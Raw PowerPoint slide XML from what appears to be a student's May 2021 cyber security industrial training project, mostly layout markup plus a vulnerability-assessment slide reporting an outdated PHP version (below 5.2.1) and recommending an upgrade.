                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-342900" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-342900" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-342900" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1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05"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256032" y="265176"/>
            <a:ext cx="11683049" cy="6332433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F5F5F5"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b"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1" name="Google Shape;11;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521208" y="448056"/>
            <a:ext cx="6876288" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrik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05"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="4416552" cy="397764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50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="6203952"/>
            <a:ext cx="3276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595959"/>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14" name="Google Shape;14;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="6203952"/>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595959"/>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15" name="Google Shape;15;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375904" y="6203952"/>
            <a:ext cx="3276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595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p105"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604434" y="1196392"/>
            <a:ext cx="10983132" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="25400">
            <a:solidFill>
              <a:srgbClr val="D24726"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800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2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3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31.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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3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chart" Target="../charts/char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30.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chart" Target="../charts/char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27.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2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25.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23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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33.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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="1295401"/>
            <a:ext cx="5326856" cy="1425577"/>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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Algerian"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800">
                <a:latin typeface="Algerian"/>
                <a:ea typeface="Algerian"/>
                <a:cs typeface="Algerian"/>
                <a:sym typeface="Algerian"/>
              </a:rPr>
              <a:t>CYBER SECURITY INDUSTRIAL TRAINING</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567709" y="3906837"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Algerian"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Algerian"/>
                <a:ea typeface="Algerian"/>
                <a:cs typeface="Algerian"/>
                <a:sym typeface="Algerian"/>
              </a:rPr>
              <a:t>MAJOR PROJECT : MAY 2021</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Algerian"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Algerian"/>
                <a:ea typeface="Algerian"/>
                <a:cs typeface="Algerian"/>
                <a:sym typeface="Algerian"/>
              </a:rPr>
              <a:t>NAME: RITISH RAMDAS ZALKE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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="551688"/>
            <a:ext cx="6858830" cy="88392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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>     </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>2. PHP &lt; 5.2.1 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="126" name="Google Shape;126;p10"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.1.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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                                      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Such versions may be affected by several issues, including buffer overflows, format string vulnerabilities, arbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and clobbering of super-globals.</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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Upgrade to PHP version 5.2.1 or later.</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127" name="Google Shape;127;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7133150" y="2979783"/>
            <a:ext cx="548640" cy="415834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
